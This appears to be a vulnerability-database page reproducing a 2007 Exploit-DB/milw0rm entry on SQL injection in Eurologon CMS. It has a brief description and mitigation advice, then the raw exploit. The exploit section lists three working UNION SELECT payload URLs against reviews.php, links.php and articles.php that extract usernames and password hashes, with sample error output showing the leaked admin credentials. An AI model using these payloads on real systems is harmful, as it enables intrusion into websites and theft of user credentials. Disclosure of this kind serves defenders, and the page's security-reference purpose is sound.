Eurologon CMS reviews.php/links.php/articles.php SQL Injection

vendor:

Eurologon CMS

by:

KiNgOfThEwOrLd

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Eurologon CMS

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE: a:eurologon_cms:Unknown

Metasploit:

Other Scripts:

Platforms Tested:

2007

Eurologon CMS reviews.php/links.php/articles.php SQL Injection

The Eurologon CMS is vulnerable to SQL Injection. Attackers can exploit this vulnerability by injecting malicious SQL queries into the 'id' parameter of the reviews.php, links.php, and articles.php pages. This allows them to retrieve sensitive information from the database, such as usernames and passwords.

Mitigation:

The vendor should sanitize user input and use prepared statements or parameterized queries to prevent SQL Injection attacks. Additionally, they should regularly update their software to fix any security vulnerabilities.

Source

Exploit-DB raw data:

---------------------------------------------------------------
 ____            __________         __             ____  __   
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_ 
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |  
 |___|___|  /\__|  /______  /\___  >__|            |___||__|  
          \/\______|      \/     \/                         
---------------------------------------------------------------

Http://www.inj3ct-it.org 	     Staff[at]inj3ct-it[dot]org 

---------------------------------------------------------------

Eurologon CMS reviews.php/links.php/articles.php SQL Injection

---------------------------------------------------------------

#By KiNgOfThEwOrLd

---------------------------------------------------------------
PoC

Useless..
---------------------------------------------------------------
Exploit

http://[target]/reviews.php?id='+union+select+1,concat(username,0x3a,password)
+from+users/*
http://[target]/links.php?id='+union+select+1,concat(username,0x3a,password)
+from+users/*
http://[target]/articles.php?id='+union+select+1,concat(username,0x3a,password)
+from+users/*
---------------------------------------------------------------
Result

You will see the disclosed informations under some mysql errors like:

Can't execute query

[QUERY]
		

MySQL Error: The used SELECT statements have a different number of columns
Can't execute query

[QUERY]	

MySQL Error: The used SELECT statements have a different number of columns
Can't execute query

[QUERY]	

MySQL Error: The used SELECT statements have a different number of columns

Home >  [category_name] > [category_name] > [admin_name]:[admin_hash]
---------------------------------------------------------------

# milw0rm.com [2007-11-27]